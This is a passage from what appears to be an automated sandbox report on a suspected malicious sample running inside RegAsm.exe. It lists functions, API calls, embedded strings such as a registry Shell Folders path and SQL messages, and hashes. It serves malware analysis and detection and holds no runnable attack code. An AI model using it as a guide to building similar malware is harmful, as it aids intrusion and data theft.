                                                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2047574939-0
                                                                                                                                                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4218492932-0
                                                                                                                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                • String ID: gj
                                                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                Function 0040BDB0 Relevance: 10.7, APIs: 7, Instructions: 151COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00404363: RtlAllocateHeap.NTDLL(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateFreeHeapLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1111736024-0
                                                                                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                • API String ID: 3510742995-2446657581
                                                                                                                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                                                                                • String ID: 6$\
                                                                                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                                                Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesErrorFileLastSleep$free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1470729244-0
                                                                                                                                                                                • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                                                                                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memsetstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2350177629-0
                                                                                                                                                                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                • API String ID: 2221118986-1606337402
                                                                                                                                                                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                • memset.MSVCRT ref: 00409042
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 265355444-0
                                                                                                                                                                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
